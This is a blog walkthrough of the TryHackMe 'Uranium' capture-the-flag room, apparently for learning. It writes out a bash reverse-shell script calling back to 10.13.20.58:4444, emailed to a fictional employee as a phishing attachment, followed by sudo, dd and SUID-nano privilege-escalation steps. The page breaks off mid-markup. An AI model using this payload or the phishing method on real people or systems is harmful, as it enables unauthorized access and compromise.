<!doctype html><html amp lang="en-gb"><head><meta charset="utf-8"><title>Tryhackme: Uranium CTF Walkthrough - Sync_Pundit&#x27;s Blog👽😎🔱🔥</title><meta name="description" content="Uranium CTF - Walkthrough. Step by step guide on how to exploit Uranium CTF on https://tryhackme.com/room/uranium"><link rel="canonical" href="https://blog.syncpundit.com/uranium-ctf-walkthrough/"><meta name="viewport" content="width=device-width,minimum-scale=1,initial-scale=1"><link href="https://fonts.googleapis.com/css?family=Roboto:400,700&display=swap" rel="stylesheet" type="text/css"><script async custom-element="amp-sidebar" src="https://cdn.ampproject.org/v0/amp-sidebar-0.1.js"></script><script async custom-element="amp-social-share" src="https://cdn.ampproject.org/v0/amp-social-share-0.1.js"></script><script async custom-element="amp-iframe" src="https://cdn.ampproject.org/v0/amp-iframe-0.1.js"></script><script async custom-element="amp-video" src="https://cdn.ampproject.org/v0/amp-video-0.1.js"></script><script type="application/ld+json">{"@context":"http://schema.org","@type":"Article","mainEntityOfPage":{"@type":"WebPage","@id":"https://blog.syncpundit.com/amp/uranium-ctf-walkthrough/"},"headline":"Tryhackme: Uranium CTF Walkthrough","datePublished":"2021-09-20T20:45","dateModified":"2021-09-22T23:00","image":{"@type":"ImageObject","url":"https://blog.syncpundit.com/media/posts/6/uranium-logo-3.jpeg","height":474,"width":474},"description":"I loved this room! We get our foothold through phishing one of Uranium's employees. We found an account of one the employees: hakanbey&hellip;","author":{"@type":"Person","name":"Sync_Pundit"},"publisher":{"@type":"Organization","name":"Sync_Pundit","logo":{"@type":"ImageObject","url":"https://blog.syncpundit.com/media/website/syncc-2.png","height":937,"width":1909}}}</script><style amp-custom>article,
aside,
footer,
header,
hgroup,
main,
nav,
section {
  display: block; }

*,
*:before,
*:after {
  -webkit-box-sizing: content-box;
  box-sizing: content-box;
  margin: 0;
  padding: 0; }

li {
  list-style: none; }

amp-img {
  max-width: 100%; }

button,
input,
select,
textarea {
  font: inherit; }

html {
  font-size: 1rem; }

body {
  background: #f1f1f1;
  color: #262626;
  font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;
  line-height: 1.6; }

a {
  color:  #039be5;
  text-decoration: none;
  -webkit-transition: all 0.12s linear 0s;
  -o-transition: all 0.12s linear 0s;
  transition: all 0.12s linear 0s; }

a:hover {
  color: #262626;
  text-decoration: underline;
  -webkit-text-decoration-skip: ink;
  text-decoration-skip: ink; }

a:active {
  color: #262626; }

a:focus {
  outline: 2px dotted #039be5; }

figure,
blockquote,
p,
ul,
ol,
dl,
table,
hr,
fieldset {
  margin-top: 1.6rem; }

h1,
h2,
h3,
h4,
h5,
h6 {
  color: #262626;
  font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;
  font-weight: 500;
  line-height: 1.2;
  margin-top: 2.13333rem; }

h1 {
  font-size: 1.67583rem;
  font-weight: normal; }

h2 {
  font-size: 1.4729rem; }

h3 {
  font-size: 1.29454rem; }

h4 {
  font-size: 1.13778rem; }

h5 {
  font-size: 1rem; }

h6 {
  font-size: 0.87891rem; }

h2 + p,
h3 + p,
h4 + p,
h5 + p,
h6 + p {
  margin-top: 0.8rem; }

b,
strong {
  font-weight: 600; }

blockquote {
  color: #6c7175;
  font-family: "Droid Serif", "Times", "Source Serif Pro", serif;
  font-style: italic;
  padding: 1.33333rem 0.53333rem 1.33333rem 3.2rem;
  position: relative; }
  blockquote:before {
    display: block;
    content: "\201C";
    font-size: 4.41226rem;
    position: absolute;
    left: 0;
    top: -12px;
    color: rgba(108, 113, 117, 0.5); }
  blockquote > :nth-child(1) {
    margin-top: 0; }

ul,
ol {
  margin-left: 2rem; }
  ul > li,
  ol > li {
    list-style: inherit;
    padding: 0 0 0.26667rem 0.26667rem; }

dl dt {
  color: #262626;
  font-weight: 600; }

code,
pre {
  background-color: #f1f1f1;
  font-family: monospace; }

pre {
  margin: 1.6rem 0 0;
  padding: 1.6rem;
  white-space: pre-wrap;
  word-wrap: break-word;
  overflow-x: auto; }
  pre > code {
    color: #262626;
    padding: 0; }

code {
  border-radius: 3px;
  color: #262626;
  padding: 0.26667rem 0.53333rem; }

table {
  border-collapse: collapse;
  border-spacing: 0;
  border: 1px solid #d4d4d4;
  width: 100%;
  overflow-x: auto;
  vertical-align: top;
  text-align: left;
  white-space: nowrap; }
  table th {
    font-weight: 500;
    padding: 0.53333rem 1.06667rem; }
  table tr {
    border-bottom: 1px solid #d4d4d4; }
    table tr:nth-child(2n) {
      background: #f1f1f1; }
  table td {
    padding: 0.53333rem 1.06667rem; }

figcaption {
  clear: both;
  color: rgba(108, 113, 117, 0.6);
  font-size: 0.82397rem;
  margin: 0.8rem 0 0;
  text-align: center; }

sub,
sup {
  font-size: 65%; }

hr {
  border: 0;
  height: 0;
  border-top: 1px solid rgba(0, 0, 0, 0.1);
  border-bottom: 1px solid rgba(255, 255, 255, 0.3); }

.btn, [type=button],
[type=submit],
button {
  background: #039be5;
  border: none;
  border-radius: 2px;
  color: #ffffff;
  cursor: pointer;
  display: inline-block;
  font-size: 0.87891rem;
  font-weight: 500;
  line-height: 1.9;
  padding: 0.53333rem 1.33333rem;
  text-align: center;
  text-decoration: none;
  -webkit-transition: all .15s ease;
  -o-transition: all .15s ease;
  transition: all .15s ease;
  width: auto; }
  .btn:hover, [type=button]:hover,
  [type=submit]:hover,
  button:hover {
    background: #262626;
    color: #ffffff; }
  .btn:focus, [type=button]:focus,
  [type=submit]:focus,
  button:focus {
    outline: none; }
  .btn-outline {
    border: 1px solid #ddd;
    background: #ffffff;
    border-radius: 3px;
    color: #262626; }

[type=button],
[type=submit],
button {
  text-transform: uppercase;
  -webkit-appearance: none;
  -moz-appearance: none; }

.navbar {
  background: #039be5;
  -webkit-box-shadow: 0 0 6px 0 rgba(0, 0, 0, 0.2);
  box-shadow: 0 0 6px 0 rgba(0, 0, 0, 0.2);
  line-height: 3;
  max-height: 4rem; }
  .navbar > div {
    -webkit-box-align: center;
    -ms-flex-align: center;
    align-items: center;
    display: -webkit-box;
    display: -ms-flexbox;
    display: flex;
    -webkit-box-pack: center;
    -ms-flex-pack: center;
    justify-content: center;
    text-align: left;
    max-width: 700px;
    margin: 0 auto; }
  .navbar a {
    color: #ffffff;
    text-decoration: none; }
  .navbar-sidebar-toggle {
    left: 0;
    position: relative;
    text-indent: -99999rem; }
    .navbar-sidebar-toggle:before {
      content: "";
      display: block;
      border-top: 0.375rem double #ffffff;
      border-bottom: 0.125rem solid #ffffff;
      height: 0.125rem;
      position: absolute;
      text-indent: 0;
      top: 50%;
      width: 1.3rem;
      -webkit-transform: translate(0px, -50%);
      -ms-transform: translate(0px, -50%);
      transform: translate(0px, -50%); }


.logo {
            background-image: url('https://blog.syncpundit.com/media/website/syncc-2.png');
            background-size: auto 2rem;
            background-repeat: no-repeat;
            background-position: center center;
            display: inline-block;
  font-weight: 600;
  line-height: 1;
            margin: 0 auto;
            height: 2rem;
            text-indent: -9999px;
            width: 240px;vertical-align: middle;
        }
        .logo.logo-text {
            line-height: 2;
            text-align: center;
            text-indent: 0;
        }

amp-sidebar {
  background: #ffffff;
  width: 240px; }
  amp-sidebar > ul {
    margin: 0.8rem 0 0;
    padding: 0; }
    amp-sidebar > ul ul {
      border-left: 1px solid #d4d4d4;
      margin: 0.53333rem 0 0; }
    amp-sidebar > ul li {
      color: #262626;
      font-size: 0.9375rem;
      font-weight: 600;
      list-style: none;
      line-height: 1.4;
      padding: 0.42667rem 1.06667rem; }
      amp-sidebar > ul li li {
        font-weight: normal;
        padding: 0.26667rem 0 0.26667rem 1.06667rem; }
    amp-sidebar > ul a,
    amp-sidebar > ul a:visited {
      color: #262626; }

.bg-white {
  background: #ffffff; }

.wrap-page {
  max-width: 700px;
  margin: 0 auto; }

@media all and (max-width: 43.6875em) {
  .wrap-inner {
    padding: 0 6%; } }

.page-title {
  background: #ffffff;
  -webkit-box-shadow: 0 2px 3px rgba(38, 38, 38, 0.1);
  box-shadow: 0 2px 3px rgba(38, 38, 38, 0.1);
  margin-bottom: 0.8rem;
  padding: 1.6rem 6%; }
  .page-title > h1 {
    margin: 0;
    font-size: 1.29454rem; }
  .page-title > p {
    font-size: 0.87891rem;
    color: #6c7175;
    line-height: 1.3;
    margin: 0.26667rem 0 0; }
  .page-title-author {
    border-radius: 50%;
    float: left;
    height: 2.5rem;
    width: 2.5rem; }
    .page-title-author + h1 {
      margin-left: 3.5rem; }
      .page-title-author + h1 + p {
        margin-left: 3.5rem; }

.card {
  background: #ffffff;
  -webkit-box-shadow: 0 2px 3px rgba(38, 38, 38, 0.1);
  box-shadow: 0 2px 3px rgba(38, 38, 38, 0.1);
  margin-bottom: 0.8rem;
  padding-bottom: 1.06667rem; }

  .card-meta {
    border-top: 1px solid #d4d4d4;
    color: rgba(108, 113, 117, 0.6);
    font-size: 0.7242rem;
    font-weight: 500;
    margin-top: 1.06667rem;
    padding-top: 1.06667rem;
    text-transform: uppercase; }
    .card-meta a + time:before {
      content: "";
      background: #d4d4d4;
      display: inline-block;
      height: 3px;
      margin: 0 8px;
      width: 3px;
      vertical-align: middle;
      border-radius: 50%; }
  .card-text {
    font-size: 0.9375rem;
    overflow: hidden;
    padding: 0 6%; }
    .card-text h2 {
      font-size: 1.13778rem; }

.post {
  margin-bottom: 2.13333rem; }
  .post-featured-image {
    margin-top: 0;
    position: relative; }
    .post-featured-image > figcaption {
      background: rgba(0, 0, 0, 0.5);
      border-radius: 3px;
      color: #ffffff;
      position: absolute;
      bottom: 0.8rem;
      padding: 0 0.26667rem;
      right: 6%; }
  .post-header {
    margin-bottom: 2.13333rem; }
  .post-meta {
    border-bottom: 1px solid #d4d4d4;
    color: rgba(108, 113, 117, 0.6);
    font-size: 0.7242rem;
    font-weight: 500;
    margin-top: 1.06667rem;
    padding-bottom: 1.06667rem;
    text-transform: uppercase; }
    .post-meta a + time:before {
      content: "";
      background: #d4d4d4;
      display: inline-block;
      height: 3px;
      margin: 0 8px;
      width: 3px;
      vertical-align: middle;
      border-radius: 50%; }
  .post-tag {
    margin: 0; }
    .post-tag > li {
      display: inline-block;
      padding: 0; }
      .post-tag > li a {
        background: #f1f1f1;
        border-radius: 2px;
        color: #6c7175;
        font-size: 0.77248rem;
        display: inline-block;
        margin: 0 0.26667rem 0.26667rem 0;
        padding: 0.26667rem 0.53333rem; }
        .post-tag > li a:hover {
          background: #039be5;
          color: #ffffff;
          text-decoration: none; }
  .post-share {
    display: -webkit-box;
    display: -ms-flexbox;
    display: flex;
    -webkit-box-orient: horizontal;
    -webkit-box-direction: normal;
    -ms-flex-direction: row;
    flex-direction: row;
    -webkit-box-pack: justify;
    -ms-flex-pack: justify;
    justify-content: space-between;
    margin-top: 1.6rem;
    width: 100%; }
    .post-share amp-social-share {
      -webkit-box-flex: 1;
      -ms-flex: 1 0 auto;
      flex: 1 0 auto;
      background-size: 24px; }
  .post-scroll {
    color: #ffffff;
    background: #039be5;
    bottom: 10px;
    border-radius: 50%;
    border: none;
    -webkit-box-shadow: 0 1px 1.5px 0 rgba(38, 38, 38, 0.12), 0 1px 1px 0 rgba(38, 38, 38, 0.24);
    box-shadow: 0 1px 1.5px 0 rgba(38, 38, 38, 0.12), 0 1px 1px 0 rgba(38, 38, 38, 0.24);
    font-size: 1.13778rem;
    height: 46px;
    opacity: 0;
    outline: none;
    position: fixed;
    padding: 0;
    right: 4%;
    visibility: hidden;
    width: 46px;
    z-index: 9999; }
    .post-scroll-marker {
      height: 0px;
      position: absolute;
      top: 100px;
      width: 0px; }
        .post-pagination {
    background: #f1f1f1;
    -webkit-box-shadow: inset 0 2px 3px rgba(38, 38, 38, 0.1);
    box-shadow: inset 0 2px 3px rgba(38, 38, 38, 0.1);
    border-top: 1px solid #d4d4d4;
    padding: 1.06667rem 0; }
    .post-pagination > div {
      line-height: 1.2;
      padding: 0.53333rem 1.06667rem;
      text-align: center; }
      .post-pagination > div span {
        display: block;
        color: #6c7175;
        font-size: 0.7242rem;
        font-weight: 500;
        margin-bottom: 0.26667rem;
        text-transform: uppercase; }
    .post-pagination-prev a:before {
      content: "\2190";
      margin-right: 0.26667rem; }
    .post-pagination-next a:after {
      content: "\2192";
      margin-left: 0.26667rem; }

aside {
  margin: 1.6rem 0 0; }

.align-left {
  text-align: left; }

.align-right {
  text-align: right; }

.align-center {
  text-align: center; }

.align-justify {
  text-align: justify; }

.msg {
  border-left: 2px solid transparent;
  padding: 1.06667rem 1.06667rem; }
  .msg--highlight {
    background-color: #fff8e6;
    border-color: #e2ac4f; }
  .msg--info {
    background: rgba(45, 97, 201, 0.03);
    border-color: #039be5; }
  .msg--success {
    background: #f7fbf6;
    border-color: #5ab44b; }
  .msg--warning {
    background: #fff3f3;
    border-color: #c06367;
    color: #a94442; }

.dropcap:first-letter {
  float: left;
  font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;
  font-size: 2.16943rem;
  line-height: 0.7;
  margin-right: 0.53333rem;
  padding: 0.53333rem 0.53333rem 0.53333rem 0; }

.pagination {
  display: -webkit-box;
  display: -ms-flexbox;
  display: flex;
  -webkit-box-pack: justify;
  -ms-flex-pack: justify;
  justify-content: space-between;
  margin: 0.8rem 0; }
  .pagination > a {
    padding-left: 0;
    padding-right: 0;
    width: 49%; }
  .pagination-right {
    margin-left: auto; }

.bottom {
  background: #039be5;
  color: #ffffff;
  padding: 1.06667rem 4%;
  text-align: center; }</style><style amp-boilerplate>body{-webkit-animation:-amp-start 8s steps(1,end) 0s 1 normal both;-moz-animation:-amp-start 8s steps(1,end) 0s 1 normal both;-ms-animation:-amp-start 8s steps(1,end) 0s 1 normal both;animation:-amp-start 8s steps(1,end) 0s 1 normal both}@-webkit-keyframes -amp-start{from{visibility:hidden}to{visibility:visible}}@-moz-keyframes -amp-start{from{visibility:hidden}to{visibility:visible}}@-ms-keyframes -amp-start{from{visibility:hidden}to{visibility:visible}}@-o-keyframes -amp-start{from{visibility:hidden}to{visibility:visible}}@keyframes -amp-start{from{visibility:hidden}to{visibility:visible}}</style><noscript><style amp-boilerplate>body{-webkit-animation:none;-moz-animation:none;-ms-animation:none;animation:none}</style></noscript><script async src="https://cdn.ampproject.org/v0.js"></script><script custom-element="amp-animation" src="https://cdn.ampproject.org/v0/amp-animation-0.1.js" async></script><script custom-element="amp-position-observer" src="https://cdn.ampproject.org/v0/amp-position-observer-0.1.js" async></script></head><body class="bg-white"><nav class="navbar wrap-inner" id="top"><div><a on="tap:navbar-sidebar.toggle" class="navbar-sidebar-toggle" title="Menu">Menu</a> <a class="logo" href="https://blog.syncpundit.com/amp/">Sync_Pundit&#x27;s Blog👽😎🔱🔥</a></div></nav><main class="wrap-page"><article class="post"><figure class="post-featured-image"><amp-img src="https://blog.syncpundit.com/media/posts/6/uranium-logo-3.jpeg" alt="uranium.thm logo" srcset="https://blog.syncpundit.com/media/posts/6/responsive/uranium-logo-3-xs.jpeg 300w ,https://blog.syncpundit.com/media/posts/6/responsive/uranium-logo-3-sm.jpeg 480w ,https://blog.syncpundit.com/media/posts/6/responsive/uranium-logo-3-md.jpeg 768w" sizes="(max-width: 768px) 100vw, 768px" height="474" layout="responsive" width="474"></amp-img></figure><div class="wrap-inner"><header class="post-header"><h1>Tryhackme: Uranium CTF Walkthrough</h1><p class="post-meta"><time datetime="2021-09-20T20:45">Monday, 20 September 2021</time></p></header><address>I loved this <span><a href="https://tryhackme.com/room/uranium/" target="_blank" rel="noopener noreferrer">room</a></span>! We get our foothold through phishing one of Uranium's employees. We found an account of one  the employees: <span><a href="https://twitter.com/hakanbe40520689" target="_blank" rel="noopener">hakanbey </a></span></address><address> </address><h2>RECONNAISSANCE</h2><p>From his twitter account we get a few interesting things.</p><p>1. We have Uranium's domain, <span>uranium.thm</span>:</p><figure class="post__image post__image--center"><amp-img src="https://blog.syncpundit.com/media/posts/6/uranium-domain.png" sizes="(max-width: 48em) 100vw, 768px" srcset="https://blog.syncpundit.com/media/posts/6/responsive/uranium-domain-xs.png 300w ,https://blog.syncpundit.com/media/posts/6/responsive/uranium-domain-sm.png 480w ,https://blog.syncpundit.com/media/posts/6/responsive/uranium-domain-md.png 768w ,https://blog.syncpundit.com/media/posts/6/responsive/uranium-domain-lg.png 1024w ,https://blog.syncpundit.com/media/posts/6/responsive/uranium-domain-xl.png 1360w ,https://blog.syncpundit.com/media/posts/6/responsive/uranium-domain-2xl.png 1600w" alt="uranium domain" width="601" height="220" layout="responsive"></amp-img></figure><p>2. We can infer his email address is <a href="mailto:hakanbey@uranium.thm:"><span>hakanbey@uranium.thm</span>:</a></p><figure class="post__image"><amp-img src="https://blog.syncpundit.com/media/posts/6/uranium-username.png" sizes="(max-width: 48em) 100vw, 768px" srcset="https://blog.syncpundit.com/media/posts/6/responsive/uranium-username-xs.png 300w ,https://blog.syncpundit.com/media/posts/6/responsive/uranium-username-sm.png 480w ,https://blog.syncpundit.com/media/posts/6/responsive/uranium-username-md.png 768w ,https://blog.syncpundit.com/media/posts/6/responsive/uranium-username-lg.png 1024w ,https://blog.syncpundit.com/media/posts/6/responsive/uranium-username-xl.png 1360w ,https://blog.syncpundit.com/media/posts/6/responsive/uranium-username-2xl.png 1600w" alt="uranium email" width="604" height="438" layout="responsive"></amp-img></figure><p>3. He opens his mail from the terminal if the file is an application (<span>filename: "application"</span>)</p><figure class="post__image post__image--center"><amp-img src="https://blog.syncpundit.com/media/posts/6/uranium-file-policy.png" sizes="(max-width: 48em) 100vw, 768px" srcset="https://blog.syncpundit.com/media/posts/6/responsive/uranium-file-policy-xs.png 300w ,https://blog.syncpundit.com/media/posts/6/responsive/uranium-file-policy-sm.png 480w ,https://blog.syncpundit.com/media/posts/6/responsive/uranium-file-policy-md.png 768w ,https://blog.syncpundit.com/media/posts/6/responsive/uranium-file-policy-lg.png 1024w ,https://blog.syncpundit.com/media/posts/6/responsive/uranium-file-policy-xl.png 1360w ,https://blog.syncpundit.com/media/posts/6/responsive/uranium-file-policy-2xl.png 1600w" alt="uranium filename policy" width="605" height="179" layout="responsive"></amp-img></figure><p> </p><p>From a basic nmap scan we found a few open ports: 22, 25 and 80 which are standard ssh, smtp and HTTP ports respectively.</p><figure class="post__image post__image--center"><amp-img src="https://blog.syncpundit.com/media/posts/6/uranium-nmap-recon.png" sizes="(max-width: 48em) 100vw, 768px" srcset="https://blog.syncpundit.com/media/posts/6/responsive/uranium-nmap-recon-xs.png 300w ,https://blog.syncpundit.com/media/posts/6/responsive/uranium-nmap-recon-sm.png 480w ,https://blog.syncpundit.com/media/posts/6/responsive/uranium-nmap-recon-md.png 768w ,https://blog.syncpundit.com/media/posts/6/responsive/uranium-nmap-recon-lg.png 1024w ,https://blog.syncpundit.com/media/posts/6/responsive/uranium-nmap-recon-xl.png 1360w ,https://blog.syncpundit.com/media/posts/6/responsive/uranium-nmap-recon-2xl.png 1600w" alt="uranium nmap scan" width="1487" height="433" layout="responsive"></amp-img></figure><p> </p><h2>INITIAL ACCESS</h2><p>From the intel we have, a phishing attack is clearly the ripe vector. We're going to send him an "application" 😈 for him to review.</p><blockquote><p>┌──(ihawu㉿lesizwe)-[~/Documents/tryhackme/a]<br>└─$ cat application      <br>#!/bin/bash<br><br>bash -c 'exec bash -i &amp;&gt;/dev/tcp/10.13.20.58/4444 &lt;&amp;1'</p></blockquote><p>We'll send hakanbey our payload using a command line based smtp email delivery program, sendEmail, and start a netcat listener of course :)</p><blockquote><p>sendEmail -t hakanbey@uranium.thm -f example@gmail.com -s 10.13.20.58 -u "Uranium Coin Wallet Beta" -m "Here's the beta for the wallet" -o tls=no -a application</p></blockquote><p>Wait for it...... wait for it....</p><figure class="post__image post__image--center"><amp-img src="https://blog.syncpundit.com/media/posts/6/uranium-initial-access-2.png" sizes="(max-width: 48em) 100vw, 768px" srcset="https://blog.syncpundit.com/media/posts/6/responsive/uranium-initial-access-2-xs.png 300w ,https://blog.syncpundit.com/media/posts/6/responsive/uranium-initial-access-2-sm.png 480w ,https://blog.syncpundit.com/media/posts/6/responsive/uranium-initial-access-2-md.png 768w ,https://blog.syncpundit.com/media/posts/6/responsive/uranium-initial-access-2-lg.png 1024w ,https://blog.syncpundit.com/media/posts/6/responsive/uranium-initial-access-2-xl.png 1360w ,https://blog.syncpundit.com/media/posts/6/responsive/uranium-initial-access-2-2xl.png 1600w" alt="uranium initial access" width="974" height="128" layout="responsive"></amp-img></figure><p>And we get the first user flag in the home directory</p><pre><code>hakanbey@uranium:~$ ls
chat_with_kral4  mail_file  user_1.txt
hakanbey@uranium:~$ cat user_1.txt
thm<span>{--REDACTED--}</span>
hakanbey@uranium:~$ 
</code></pre><h2>PRIVILEGE ESCALATION</h2><p>In the home folder we can see a binary named <span>chat_with_kral4</span> , let's find out what it is.</p><pre><code>hakanbey@uranium:~$ ls
chat_with_kral4  mail_file  user_1.txt
hakanbey@uranium:~$ 

hakanbey@uranium:~$ ./chat_with_kral4
PASSWORD :
</code></pre><p>The app needs a password. Lets stash it for now and look around the system. One of my go-to directories is /var/log/. </p><figure class="post__image post__image--center"><amp-img src="https://blog.syncpundit.com/media/posts/6/uranium-pcap-log.png" sizes="(max-width: 48em) 100vw, 768px" srcset="https://blog.syncpundit.com/media/posts/6/responsive/uranium-pcap-log-xs.png 300w ,https://blog.syncpundit.com/media/posts/6/responsive/uranium-pcap-log-sm.png 480w ,https://blog.syncpundit.com/media/posts/6/responsive/uranium-pcap-log-md.png 768w ,https://blog.syncpundit.com/media/posts/6/responsive/uranium-pcap-log-lg.png 1024w ,https://blog.syncpundit.com/media/posts/6/responsive/uranium-pcap-log-xl.png 1360w ,https://blog.syncpundit.com/media/posts/6/responsive/uranium-pcap-log-2xl.png 1600w" alt="uranium pcap file" width="1352" height="213" layout="responsive"></amp-img> </figure><p><span>hakanbey_network_log.pcap</span> is definitely worth looking into. Let's download and look into it.</p><figure class="post__image post__image--center"><amp-img src="https://blog.syncpundit.com/media/posts/6/uranium-get-the-pcap.png" sizes="(max-width: 48em) 100vw, 768px" srcset="https://blog.syncpundit.com/media/posts/6/responsive/uranium-get-the-pcap-xs.png 300w ,https://blog.syncpundit.com/media/posts/6/responsive/uranium-get-the-pcap-sm.png 480w ,https://blog.syncpundit.com/media/posts/6/responsive/uranium-get-the-pcap-md.png 768w ,https://blog.syncpundit.com/media/posts/6/responsive/uranium-get-the-pcap-lg.png 1024w ,https://blog.syncpundit.com/media/posts/6/responsive/uranium-get-the-pcap-xl.png 1360w ,https://blog.syncpundit.com/media/posts/6/responsive/uranium-get-the-pcap-2xl.png 1600w" alt="uranium pcap file" width="803" height="384" layout="responsive"></amp-img></figure><p>We open it with wireshark and follow the tcp stream and, wait for it......</p><figure class="post__image post__image--center"><amp-img src="https://blog.syncpundit.com/media/posts/6/uranium-tcp-stream.png" sizes="(max-width: 48em) 100vw, 768px" srcset="https://blog.syncpundit.com/media/posts/6/responsive/uranium-tcp-stream-xs.png 300w ,https://blog.syncpundit.com/media/posts/6/responsive/uranium-tcp-stream-sm.png 480w ,https://blog.syncpundit.com/media/posts/6/responsive/uranium-tcp-stream-md.png 768w ,https://blog.syncpundit.com/media/posts/6/responsive/uranium-tcp-stream-lg.png 1024w ,https://blog.syncpundit.com/media/posts/6/responsive/uranium-tcp-stream-xl.png 1360w ,https://blog.syncpundit.com/media/posts/6/responsive/uranium-tcp-stream-2xl.png 1600w" alt="uranium tcp stream" width="626" height="403" layout="responsive"></amp-img></figure><p>That weird string before the chats is likely the password to the <span>chat_with_kral4 </span>app we found. Let's try it and see. </p><figure class="post__image post__image--center"><amp-img src="https://blog.syncpundit.com/media/posts/6/uranium-user-pass.png" sizes="(max-width: 48em) 100vw, 768px" srcset="https://blog.syncpundit.com/media/posts/6/responsive/uranium-user-pass-xs.png 300w ,https://blog.syncpundit.com/media/posts/6/responsive/uranium-user-pass-sm.png 480w ,https://blog.syncpundit.com/media/posts/6/responsive/uranium-user-pass-md.png 768w ,https://blog.syncpundit.com/media/posts/6/responsive/uranium-user-pass-lg.png 1024w ,https://blog.syncpundit.com/media/posts/6/responsive/uranium-user-pass-xl.png 1360w ,https://blog.syncpundit.com/media/posts/6/responsive/uranium-user-pass-2xl.png 1600w" alt="uranium chat with kral4" width="813" height="565" layout="responsive"></amp-img></figure><p>We got hakanbey's password 🎊. Now let's see what exactly we do with hakanbey's password.</p><figure class="post__image post__image--center"><amp-img src="https://blog.syncpundit.com/media/posts/6/uranium-sudo-perm.png" sizes="(max-width: 48em) 100vw, 768px" srcset="https://blog.syncpundit.com/media/posts/6/responsive/uranium-sudo-perm-xs.png 300w ,https://blog.syncpundit.com/media/posts/6/responsive/uranium-sudo-perm-sm.png 480w ,https://blog.syncpundit.com/media/posts/6/responsive/uranium-sudo-perm-md.png 768w ,https://blog.syncpundit.com/media/posts/6/responsive/uranium-sudo-perm-lg.png 1024w ,https://blog.syncpundit.com/media/posts/6/responsive/uranium-sudo-perm-xl.png 1360w ,https://blog.syncpundit.com/media/posts/6/responsive/uranium-sudo-perm-2xl.png 1600w" alt="uranium sudo -l" width="1361" height="167" layout="responsive"></amp-img></figure><p>With hakanbey we can run /bin/bash but it belongs to kral4. So we need to escalate to kral4. Let's run</p><blockquote><p>sudo -u kral4 /bin/bash</p><p> </p></blockquote><pre><code>hakanbey@uranium:~$ sudo -u kral4 /bin/bash 
kral4@uranium:~$ 
</code></pre><p>We get the second user flag in kral4's home directory. Let's snoop around kral4's account. </p><figure class="post__image post__image--center"><amp-img src="https://blog.syncpundit.com/media/posts/6/uranium-SUID-search.png" sizes="(max-width: 48em) 100vw, 768px" srcset="https://blog.syncpundit.com/media/posts/6/responsive/uranium-SUID-search-xs.png 300w ,https://blog.syncpundit.com/media/posts/6/responsive/uranium-SUID-search-sm.png 480w ,https://blog.syncpundit.com/media/posts/6/responsive/uranium-SUID-search-md.png 768w ,https://blog.syncpundit.com/media/posts/6/responsive/uranium-SUID-search-lg.png 1024w ,https://blog.syncpundit.com/media/posts/6/responsive/uranium-SUID-search-xl.png 1360w ,https://blog.syncpundit.com/media/posts/6/responsive/uranium-SUID-search-2xl.png 1600w" alt="uranium suid search" width="784" height="583" layout="responsive"></amp-img></figure><p>There are some pretty interesting tools we could use to escalate to root. Lets go check out /var again.</p><figure class="post__image post__image--center"><amp-img src="https://blog.syncpundit.com/media/posts/6/uranium-mail.png" sizes="(max-width: 48em) 100vw, 768px" srcset="https://blog.syncpundit.com/media/posts/6/responsive/uranium-mail-xs.png 300w ,https://blog.syncpundit.com/media/posts/6/responsive/uranium-mail-sm.png 480w ,https://blog.syncpundit.com/media/posts/6/responsive/uranium-mail-md.png 768w ,https://blog.syncpundit.com/media/posts/6/responsive/uranium-mail-lg.png 1024w ,https://blog.syncpundit.com/media/posts/6/responsive/uranium-mail-xl.png 1360w ,https://blog.syncpundit.com/media/posts/6/responsive/uranium-mail-2xl.png 1600w" alt="uranium /var/mail" width="1636" height="682" layout="responsive"></amp-img></figure><p>This time around we got something interesting from /var/mail. Something just popped in my head, there's a web flag we need to get. The web  flag is likely in /var/www/html but we don't have read access to it. Remember we can use /bin/dd? <span><a href="https://gtfobins.github.io/gtfobins/dd/" target="_blank" rel="noopener noreferrer">Gtfobins</a></span> says:</p><figure class="post__image post__image--center"><amp-img src="https://blog.syncpundit.com/media/posts/6/uranium-dd.png" sizes="(max-width: 48em) 100vw, 768px" srcset="https://blog.syncpundit.com/media/posts/6/responsive/uranium-dd-xs.png 300w ,https://blog.syncpundit.com/media/posts/6/responsive/uranium-dd-sm.png 480w ,https://blog.syncpundit.com/media/posts/6/responsive/uranium-dd-md.png 768w ,https://blog.syncpundit.com/media/posts/6/responsive/uranium-dd-lg.png 1024w ,https://blog.syncpundit.com/media/posts/6/responsive/uranium-dd-xl.png 1360w ,https://blog.syncpundit.com/media/posts/6/responsive/uranium-dd-2xl.png 1600w" alt="uranium dd command" width="931" height="639" layout="responsive"></amp-img></figure>Let's use this to read the web flag.<p></p><figure class="post__image post__image--center"><amp-img src="https://blog.syncpundit.com/media/posts/6/uranium-web-flag.png" sizes="(max-width: 48em) 100vw, 768px" srcset="https://blog.syncpundit.com/media/posts/6/responsive/uranium-web-flag-xs.png 300w ,https://blog.syncpundit.com/media/posts/6/responsive/uranium-web-flag-sm.png 480w ,https://blog.syncpundit.com/media/posts/6/responsive/uranium-web-flag-md.png 768w ,https://blog.syncpundit.com/media/posts/6/responsive/uranium-web-flag-lg.png 1024w ,https://blog.syncpundit.com/media/posts/6/responsive/uranium-web-flag-xl.png 1360w ,https://blog.syncpundit.com/media/posts/6/responsive/uranium-web-flag-2xl.png 1600w" alt="uranium web flag" width="815" height="125" layout="responsive"></amp-img></figure><p>Awesome!!! Let's get back to the mail we found. We understand a few things from the email:</p><ol><li>'index.html' has been attacked before</li><li>Kral4 should keep the nano binary in his home directory in case index.html is attacked again</li><li>The nano binary will be given SUID next time index.html is attacked <span>as long as it's in the home directory</span></li></ol><p>Knowing this, we need to copy the nano binary into kral4's home directory and attack the index.html file.</p><figure class="post__image post__image--center"><amp-img src="https://blog.syncpundit.com/media/posts/6/uranium-nano.png" sizes="(max-width: 48em) 100vw, 768px" srcset="https://blog.syncpundit.com/media/posts/6/responsive/uranium-nano-xs.png 300w ,https://blog.syncpundit.com/media/posts/6/responsive/uranium-nano-sm.png 480w ,https://blog.syncpundit.com/media/posts/6/responsive/uranium-nano-md.png 768w ,https://blog.syncpundit.com/media/posts/6/responsive/uranium-nano-lg.png 1024w ,https://blog.syncpundit.com/media/posts/6/responsive/uranium-nano-xl.png 1360w 